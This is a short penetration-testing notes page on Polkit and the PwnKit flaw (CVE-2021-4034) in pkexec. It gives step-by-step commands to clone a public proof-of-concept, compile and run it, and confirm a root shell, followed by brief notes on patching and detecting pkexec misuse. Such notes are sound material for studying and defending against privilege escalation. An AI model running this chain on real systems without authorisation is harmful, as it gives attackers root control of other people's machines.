23.polkit

Run command as root using pkexec

pkexec -u root id
pkexec -u root /bin/bash # or /bin/sh

pkcheck --process <pid> --action-id <action_id> --allow-user-defaults

pkaction

pkexec --user <username> <command>

git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034

gcc cve-2021-4034-poc.c -o poc

./poc

id
whoami

Key Concepts:

Polkit (PolicyKit):
- Authorization service for Linux systems.
- Controls permissions for user software and system components.
pkexec:
- A Polkit tool that allows running commands as another user (including root).
- The vulnerable component.
CVE-2021-4034 (PwnKit):
- Memory corruption vulnerability in pkexec.
- Allows unprivileged users to gain root privileges.

Vulnerability and Exploitation:

Vulnerability Details:
- The vulnerability is a memory corruption issue.
- It allows an attacker to manipulate the execution flow of pkexec.
Exploitation Process:
- Download a Proof-of-Concept (PoC) exploit.
- Compile the exploit.
- Run the exploit.
- The exploit grants a root shell.
Mitigation:
- Update Polkit to a patched version.

Exploitation Steps (as described):

Download PoC Exploit:
- git clone https://github.com/arthepsy/CVE-2021-4034.git
- cd CVE-2021-4034
Compile Exploit:
- gcc cve-2021-4034-poc.c -o poc
Run Exploit:
- ./poc
Verify Root Access:
- id

Important Considerations and Enhancements:

Vulnerability Severity:
- PwnKit is a critical vulnerability.
- It allows trivial privilege escalation.
Patching:
- Updating Polkit is essential.
Exploit Reliability:
- The PoC exploit is generally reliable.
Detection:
- Monitor for unexpected pkexec usage.
- Use intrusion detection systems.
Real world examples: Researching real world polkit exploits will help solidify understanding of the attack vectors.
Polkit Rules: More information about how polkit rules function, and how they can be missconfigured would be useful.
Polkit actions: More information about how polkit actions function would be useful.

Last updated 5 months ago